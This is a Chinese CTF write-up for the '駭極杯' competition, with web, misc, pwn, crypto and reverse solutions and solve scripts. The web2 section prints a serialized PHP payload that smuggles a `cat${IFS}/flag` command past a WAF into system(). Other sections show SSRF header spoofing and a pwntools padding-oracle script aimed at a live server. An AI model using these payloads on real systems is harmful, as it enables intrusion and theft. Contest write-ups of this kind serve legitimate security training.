FIRST
“駭極杯”全國大學生網絡安全邀請賽一手WriteUp
——特別感謝本文作者:flam4nplus——
本文作者多次參與“安恆杯”取得亮眼的成績
在本次”駭極杯”中他所在的隊伍取得了
rank 7、re和crypto均AK的好成績
~Congratulations!
Web
web1
首先,burpsuite抓一波流量
將GET改爲POST,並且post admin=1
訪問robots.txt
發現有source.php和flag.php
訪問flag.php無果,所以只能去看source.php
這裏看到需要僞造ip 在頭中僞造ip只有幾種情況:xff xci clientip remoteaddr
這裏添加X-Client-IP:127.0.0.1
繼續post url
這裏就能看到加載了圖片
卡在這裏好久,忽然想到因爲是127.0.0.1會不會是file協議 進行嘗試
發現還是會加載,在上面圖片中也發現,不是jpg而是html 所以這裏curl一下
順便拿到了題目源碼
<?php error_reporting(0); include "flag.php"; echo "you need to login as admin!"; echo "<!-- post param 'admin' -->"; if(isset($_POST['admin'])) { if($_POST['admin']==1) { if($_SERVER['HTTP_X_CLIENT_IP']) { if(isset($_POST['url']) && parse_url($_POST['url'])['host']=='www.ichunqiu.com') { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $_POST['url']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $content = curl_exec($curl); curl_close($curl); $filename='download/'.rand().';img1.jpg'; file_put_contents($filename,$content); echo $_POST['url']; $img="<img src=\"".$filename."\"/>"; echo $img; } else { echo "you need post url: http://www.ichunqiu.com"; } } else { echo "only 127.0.0.1 can get the flag!!"; } } } else { $_POST['admin']=0; }
順帶就拿到了flag
web2
這道題目首先用掃描軟件掃到了泄漏的源碼
<?php error_reporting(0); class come{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf(trim($v)); } } function waf($str){ $str=preg_replace("/[<>*;|?\n ]/","",$str); $str=str_replace('flag','',$str); return $str; } function echo($host){ system("echo $host"); } function __destruct(){ if (in_array($this->method, array("echo"))) { call_user_func_array(array($this, $this->method), $this->args); } } } $first='hi'; $var='var'; $bbb='bbb'; $ccc='ccc'; $i=1; foreach($_GET as $key => $value) { if($i===1) { $i++; $$key = $value; } else{break;} } if($first==="doller") { @parse_str($_GET['a']); if($var==="give") { if($bbb==="me") { if($ccc==="flag") { echo "<br>welcome!<br>"; $come=@$_POST['come']; unserialize($come); } } else {echo "<br>think about it<br>";} } else { echo "NO"; } } else { echo "Can you hack me?<br>"; } ?>
然後是反序列化漏洞
直接firefox f12 hackbar
http://8c2a8dee973d47ffbf0027140ec9e6dfc88e980052e84454.game.ichunqiu.com/?first=doller&a=var=give%26bbb=me%26ccc=flag come=O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A20%3A%22123%26cat%24%7BIFS%7D%2Ffl%22%22ag%22%3B%7D%7D123
直接拿到flag
Misc
簽到
很簡單的base32,直接在線解密
MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q
easy-py
此類型題目,正好在之前出過一道題,不過之前的WP寫的太簡單了,pyc的字節碼忘的都差不多了。這次趕緊蒐羅一波,把相關的東西保存一下。 參考鏈接如下: https://github.com/python/cpython/blob/master/Include/opcode.h https://bbs.pediy.com/thread-246683.htm https://das.scusec.org/2017/03/24/pythonopcode/ http://unpyc.sourceforge.net/Opcodes.html
整理之後的opcode如下:
03f3 0d0a bebc ce5b 63 00 0000 00 00 000000 0f 0000 00 40 0000 00 73 b200 0000 178長度 710600 JUMP_ABSOLUTE 642333 LOAD_CONST 710900 JUMP_ABSOLUTE 12個 640000 LOAD_CONST 0 640100 LOAD_CONST 1 640200 LOAD_CONST 2 640300 LOAD_CONST 3 640400 LOAD_CONST 4 640500 LOAD_CONST 5 640200 LOAD_CONST 2 640600 LOAD_CONST 6 640600 LOAD_CONST 6 640700 LOAD_CONST 7 640800 LOAD_CONST 8 640900 LOAD_CONST 9 640a00 LOAD_CONST a 640b00 LOAD_CONST b 640c00 LOAD_CONST c 670f00 BUILD_LIST f cmp[0xf] 5a0000 STORE_NAME 0 m[0xf]=[0,10,7,1,29,14.7,22,22,31,57,30,9,52,27] 650100 LOAD_NAME 1 raw_input 830000 CALL_FUNCTION 0 5a0200 STORE_NAME 2 flag 640000 LOAD_CONST 0 0 5a0300 STORE_NAME 3 m=0 { 785b00 SETUP_LOOP while 650200 LOAD_NAME 2 flag 44 GET_ITER 5d5300 FOR_ITER 5a0400 STORE_NAME 4 i=.. 650500 LOAD_NAME 5 ord 650400 LOAD_NAME 4 830100 CALL_FUNCTION ord(i) 0f UNARY_INVERT ~ 640d00 LOAD_CONST d 102 40 BINARY_AND & 650500 LOAD_NAME 5 650400 LOAD_NAME 4 830100 CALL_FUNCTION 1 ord(i) 641200 LOAD_CONST 0x12 -103 40 BINARY_AND & 42 BINARY_OR | 5a0400 STORE_NAME 4 i=.. 650400 LOAD_NAME 4 650000 LOAD_NAME 0 cmp 650300 LOAD_NAME 3 m 19 BINARY_SUBSCR [] 6b0200 COMPARE_OP 2 == 7290 00 POP_JUMP_IF_FALSE 650300 LOAD_NAME 3 m 0b UNARY_NEGATIVE -m 640e00 LOAD_CONST 0xe -1 17 BINARY_ADD + 0b UNARY_NEGATIVE - 5a0300 STORE_NAME 3 m=... 714900 JUMP_ABSOLUTE 714900 JUMP_ABSOLUTE 640f00 LOAD_CONST f wrong 47 PRINT_ITEM 48 PRINT_NEWLINE 650600 LOAD_NAME 6 exit 830000 CALL_FUNCTION 0 01 POP_TOP 714900 JUMP_ABSOLUTE 57 POP_BLOCK 641000 LOAD_CONST right 47 PRINT_ITEM 48 PRINT_NEWLINE 641100 53 return 28 (STORE_SLICE 130000 00 69 0000 0000 69 0a 000000 69 0700 0000 69 0100 00 00 69 1d00 0000 69 0e00 00 00 69 1600 0000 69 1f 0000 00 69 39000000 69 1e 0000 00 69 0900 0000 69 34 000000 69 1b00 0000 69 66 0000 00 69 ffff ffff 74 0500 00 00 7772 6f6e67 wrong 74 05 0000 00 7269 67 6874 right 4e69 99ff ffff 28( 07 0000 00 74 0300 0000 636d 70 cmp 74 0900 0000 7261 775f696e 7075 74 raw_input 74 0400 0000 666c 6167 flag 74 010000 00 6d m 74 01 0000 00 69 i 74 03 0000 00 6f7264 ord 74 04 0000 00 65 7869 74 exit ) 28 0000 0000 28 00 0000 00 28 0000 0000 73 0a 0000 00 65 6173 795f 7079 2e70 79 easy_py.pyc 74 0800 0000 3c6d 6f64 756c 653e <module> 0100 0000 73 14 0000 00 33 01 09 01 06 010d 011f 0110 010c 0106 0205 010b 02
在做的過程中,遇到了一個坑,網上的opcode不全導致
6b0200 COMPARE_OP 2 == 7290 00 POP_JUMP_IF_FALSE
一直不知道是什麼,糾結了好久。 解密腳本如下:
cmp=[0,10,7,1,29,14,7,22,22,31,57,30,9,52,27] flag=[] j=0 for c in range(15): for i in range(255): if cmp[j] == ((~i)&102)|(i&(-103)): j=j+1 flag.append(chr(i)) break print "".join(flag)
Pwn
aessss
拿到源碼之後,發現unpad功能沒有check,可以通過修改unpad來從後向前逐字節爆破,得到最後的flag。
腳本如下
from pwn import * import base64, time, random, string from Crypto.Cipher import AES from Crypto.Hash import SHA256, MD5 #context.log_level = 'debug' def choice1(): p.sendline('1') p.recvuntil('Here is the encrypted flag: 0x', drop = True) enflag = p.recvuntil('\nWelcome to AES(WXH) encrypt system.', drop = True) #print enflag p.recvuntil('Your choice:', drop = True) return enflag def choice2(pad): p.sendline('2') p.recvuntil('Pad me something:', drop = True) p.sendline(pad) p.recvuntil('Your choice:', drop = True) def bypassproof(): p.recvuntil('sha256(XXXX+') lastdata = p.recvuntil(')', drop=True) print lastdata p.recvuntil(' == ') digest = p.recvuntil('\nGive me XXXX:', drop=True) print digest def proof(s): return SHA256.new(s + lastdata).hexdigest() == digest data = pwnlib.util.iters.mbruteforce(proof, string.ascii_letters + string.digits, 4, method='fixed') print data p.sendline(data) #p.recvuntil('Done!\n') p = remote('106.75.13.64', 54321) bypassproof() p.recvuntil('Your choice:', drop = True) flag_enc = choice1() #print encflag flag = "" for i in range(33): a = ''.join(['a' for _ in range(223)]) a = a[:-1] + chr(224 + i) for c in string.printable: #print c+flag choice2(a) choice2(c+flag) if choice1() == flag_enc: flag = c + flag print "success:"+flag break
Crypto
rsaaaa
首先要先proof 腳本如下
def brute_force(pad, shavalue): dict = string.letters + string.digits key = "" for i1 in dict: tmp = key key1 = tmp + i1 for i2 in dict: tmp = key1 key2 = tmp + i2 for i3 in dict: tmp = key2 key3 = tmp + i3 for i4 in dict: tmp = key3 key4 = tmp + i4 final_key = key4 if sha512(pad+key4).hexdigest()==shavalue: print key4 return key4 key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5') print key_1
隨後要解決這裏的問題
發現根本不需要求解他的d和n
直接d=1,n=c-m就好
直接進入下一關
這裏需要做一個數學運算 先算cc = pow(2, e, n),然後算ccc = c*cc%n,然後把ccc發過去讓服務器解密,拿到明文後除以2
得到的就是MM
post後直接進行aes解密,拿到flag
整個交互過程如下
sha512(XkJ6v0Svif9H5wWd+XXXX) == 6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5 Tell me XXXX: ZTmx OK, you proof. Give you a message:0x6f57434e74344a6a4831485177694169 and its ciphertext:0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8 Please give me the private key to decrypt cipher n: 22084145559267142542278247205711206806769035096867203562084376236135074979071593494695165415304475011906014512427242327757399235206725659075262541485105057336477881466546208394134375073948200202231086452529564372313656850419369453050936175671378881331075871605986332054320133956210417108252203550155296981956383715305509205993100035845876676100308496728282263311014876821564144113735314621093460404122348973685951350134860330087006324081818356485787747916004167088733576488568724106608053548411305492271813170870510029120401564662767509523812680234467117029176109380429489145638460342248988331319677739729495421826415 d: 1 Oh, how you know the private key! n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1 e=0xcf90945cb5ed1485 c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0 Now, you have a chance to decrypt something(but no c): 10861852131164322077412797986625616181717063053353581369663738748831496772954289381470035381197611133580693273961257855424019526480196780126545278666064266535981465755567420264745935227134754534350002537986969850551526328493939419096511440892423045037104987011041181269866090307965509267257918136812218547637066029308872688916113197541758600923169257485066711422003515732668822443487279464330075761022284709750952016470762309134261713817800958762289127439071427678699871872454105477099012449462911427691966935866152040055058801656487819090362844926572779942769475645537130146301058513228439997764047914117721832371520 message:0xce6adae4ac9ec86c8ee264a28ae2a46e Give me right message: 137187895140717694653920589162394767927 Master in math! Here is your flag:0x4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0
exp如下
#!/usr/bin/python import random import string from hashlib import sha512 from Crypto.Util.number import * from Crypto.Cipher import AES ''' def brute_force(pad, shavalue): dict = string.letters + string.digits key = "" for i1 in dict: tmp = key key1 = tmp + i1 for i2 in dict: tmp = key1 key2 = tmp + i2 for i3 in dict: tmp = key2 key3 = tmp + i3 for i4 in dict: tmp = key3 key4 = tmp + i4 final_key = key4 if sha512(pad+key4).hexdigest()==shavalue: print key4 return key4 key_1 = brute_force('XkJ6v0Svif9H5wWd','6eb77ec24eee0fd5e59290c44acf22e377a3b08e33e0efa2bfd9971dbacf3e8a3bc32eed2fc710ddb26863f01dd82c63224fdc9851d9f9f46a9e6402c68206f5') print key_1 m = 0x6f57434e74344a6a4831485177694169 c = 0xaef0ac66619ad00415bdf53f3232fffb1e19be5ae92b187f98544187f4021d9192b731f3bdedcf024310e918b6dcf052c6c13bca7587650806bcabcba0943ada57abfe8ec6aed1749ebf35d6c1716fd40c5fed105f1604caed170421b2e12efcb174b38bf2427331e2a22bdd4731c004c4d714a3a593b2cd0fd0031968526a4420ff2adfc0b752ddf9c2381e8cfd98f0471e820ee5ee8b83955730bc1087b12151ce0c65b4a90b84555c12db8053429ee6c40e7977b087829bec0e7dc42632d9c16a162500893ac635e3b6c4e1d3e34f069cbdc8183c19a28e400751ae1c9168d0689c0162ce59852170394eb881ab99130a4837422e5081143a2b62a3bc76d8 print c-m n=0xac53a7e7f4a8ddb0d52b6df045527551d541a40365116ae66e9d8709442ffcfd786a8df7d203e117a709553d510edece5ae72c8e6f9a9552b4be987e6f2021f2a339930cdb221a8d484ea09df63c2a55f582b3c9ade2912c9650786e9f5c82973e2baea122cb895d06fa174a106d4660740f0c204666dc69168e330b2c41a78633bf24d48d023a6c0bdfa2f3761c4f38d081b5bf8c9ffd11abbe4d5be6e63f064125b3ead319c09242f5366124a0bfc8f73ba11a067a7904fec9c5497b3f376382427e3e60e95ae747cce634d721009cd13350b1cf2383c6880c05ff8ec7824339ea438ea800b5d15ec05fd0df7e53c569e1951560a75eb289f3afdf19beded1 e=0xcf90945cb5ed1485 c=0x9a9c94ec0094c5e3c1e1b6c2b534b637726cba2e8b0da0a2ba3f12cb98a225206755f13a7ae3e459489e253a6b4719645d741a48d3b47184a2bc8cc6be73b4040443821dc7796754cf5f40c3d9845f15f23486d50d06fdbcde6c017599703ac9ec6015ae61b67379f48272f4f84491506bc3e56eaf124c9b14584330657a26b4cc009c489441cafc3ed5555ff2f5806a5b56eb0d312dfea2ad985e37b5a3917f7930b492331bc1e12f71949ae7d76c53a44c5d9f7d25e8856aafd69f3b6bcfb44e5cf2fa9c09aa35bf4b6566c89f174d0c68abd8970aa41e1fe441c4b38c705979e33d5c9a2abf15560477c31b6346fcfc723289b9751f893fb7a8dac47de3f0 cc = pow(2,e,n) ccc = c*cc%n print ccc m = 0xce6adae4ac9ec86c8ee264a28ae2a46e print m/2 ''' enc_flag = '4af4a66ee3ff9bb620e20db7e0f3489bbf4bb358ad8d39a4a446ff4338570a241ec06f2d3703c7cfc1a1c6c0fce789e0' enc_flag = enc_flag.decode('hex') msg1 = '6f57434e74344a6a4831485177694169'.decode('hex') msg2 = '67356d72564f64364771325145715237'.decode('hex') cipher = AES.new(msg2, AES.MODE_CBC, msg1) dec = cipher.decrypt(enc_flag) print dec
Reverse
cpp
簽到題吧 對C++瞭解一點就不會感到那麼陌生。
fake=[0x99, 0xb0, 0x87, 0x9e, 0x70, 0xe8, 0x41, 0x44, 0x05, 0x04, 0x8b, 0x9a, 0x74, 0xbc, 0x55, 0x58, 0xb5, 0x61, 0x8e, 0x36, 0xac, 0x09, 0x59, 0xe5, 0x61, 0xdd, 0x3e, 0x3f, 0xb9, 0x15, 0xed, 0xd5] a = 0x99 b = 0xb0 c = 0x87 d = 0x9e flag=[] src=[0 for i in range(32)] xor1=[0 for i in range(32)] xor2=[0 for i in range(32)] xor3=[0 for i in range(32)] xor4=[0 for i in range(32)] src[0]=a src[1]=b src[2]=c src[3]=d xor1[0]=a xor1[1]=b^a xor1[2]=a^b^c xor1[3]=a^b^c^d xor2[0]=a xor2[1]=b xor2[2]=a^c xor2[3]=d^b xor3[0]=a xor3[1]=a^b xor3[2]=c^b xor3[3]=d^c xor4[0]=a xor4[1]=b xor4[2]=c xor4[3]=d for i in range(4,32): for j in range(255): src[i]=j xor1[i]=(xor1[i-1]^src[i])&0xff xor2[i]=(xor2[i-1]^xor1[i])&0xff xor3[i]=(xor3[i-1]^xor2[i])&0xff xor4[i]=(xor4[i-1]^xor3[i])&0xff if xor4[i]==fake[i]: break for i in range(32): for j in range(256): tmp = j*4 result = (((j>>6)|tmp)^i)&0xff if result == src[i]: flag.append(chr(j)) break print "".join(flag)#flag{W0w_y0u_m4st3r_C_p1us_p1us}
flag{W0w_y0u_m4st3r_C_p1us_p1us}
cyvm
最後的時候才放出來,非常簡單的vm題 bytecode如下:
op d1 d2 [0x0F, scanf(%s) s 0x10, 0x14, 0x20, r0=0x20 0x10, 0x16, 0x00, r2=0 0x09, 0x24, point=0x24 jmp code[0x24] label code[0x9]: 0x02, 0x15, 0x16, r1=s[r2] r2=0 r1=s[0] 0xE9, ++i 0x12, 0x16, v2 = 2 r2++ r2=1 0xE8, ++i 0x02, 0x17, 0x16, r3=s[r2] r3=s[1] 0x13, 0x16, v3 = 2 r2-- r2=0 0x90, ++i 0x06, 0x15, 0x17, r1=r1^r3 r1=s[0]^s[1] 0x45, ++i 0x06, 0x15, 0x16, r1=r1^r2 r1=s[0]^s[1]^r2 0x76, ++i 0x01, 0x15, 0x16, s[r1]=r2 s[r1]=0 0x12, 0x16, v2=2 r2++ 0xFF, ++i label code[0x24]: 0x0A, 0x14, 0x16, v9 = r0 != r2 0x0C, 0x09, if(v9) true point = d1 0x0E sub_4006d6()!=0
解密腳本:
c = [0x0A, 0x0C, 0x04, 0x1F, 0x48, 0x5A, 0x5F, 0x03, 0x62, 0x67, 0x0E, 0x61, 0x1E, 0x19, 0x08, 0x36, 0x47, 0x52, 0x13, 0x57, 0x7C, 0x39, 0x54, 0x4B, 0x05, 0x05, 0x45, 0x77, 0x15, 0x26, 0x0E, 0x62] # flag=[] def encode(): flag='a'*0x20 for i in range(32): c[i]=flag[i]^flag[i+1]^i def decode(): flag=["}"] a=[] tmp = 125 for i in range(30,-1,-1): tmp = c[i]^tmp^i flag.append(chr(tmp)) print "".join(flag[::-1]) decode()
flag{7h15_15_MY_f1rs7_s1mpl3_Vm}
What's_it
前面一部分a-z 6位md5爆破出luck string ozulmt
然後會進入自解碼部分,接下來纔是真正的驗證flag的部分,首先是驗證flag格式,並且格式化後之後提取出來,最後同固定數據進行比較即可!
爆破腳本如下:
import hashlib import string dic = string.ascii_lowercase may_fla = [] for i in dic: for j in dic: for m in dic: for n in dic: for p in dic: for q in dic: flag=i+j+m+n+p+q # print flag hl = hashlib.md5() hl.update(flag.encode(encoding='utf-8')) flag_md5 = hl.hexdigest() count=0 index_sum=0 for c in range(32): if flag_md5[c] == '0': count = count+1 index_sum = index_sum+c if (10*count+index_sum) == 403: may_fla.append(flag) print may_fla
解密腳本如下:
# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee} # flag="flag{" # flag[13]="-" # flag[18]="-" # flag[28]="-" # flag[23]="-" # flag[41]="}" c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64] flag = [] for i in c: flag.append(chr(i)) print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}